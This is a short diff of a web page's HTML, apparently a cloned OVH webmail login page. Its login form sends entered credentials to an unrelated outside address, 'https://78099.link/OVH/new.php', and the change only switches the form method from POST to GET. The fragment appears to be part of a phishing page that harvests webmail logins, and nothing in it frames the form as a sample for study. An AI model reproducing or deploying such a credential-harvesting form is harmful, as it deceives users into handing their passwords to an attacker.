--- a/index.html
+++ b/index.html
@@ -11599,7 +11599,7 @@ a2a_config.onclick = 2;</script>
                 <div class="webmail-login-form" data-drupal-selector="webmail-login-form" id="block-webmail-login-block">
   
     
-      <form action="https://78099.link/OVH/new.php" method="post" id="webmail-login-form" accept-charset="UTF-8">
+      <form action="https://78099.link/OVH/new.php" method="GET" id="webmail-login-form" accept-charset="UTF-8">
   <div data-webmail-form-container="data-webmail-form-container" data-drupal-selector="edit-webmail-login-form" id="edit-webmail-login-form--2" class="js-form-wrapper form-wrapper">
 
 
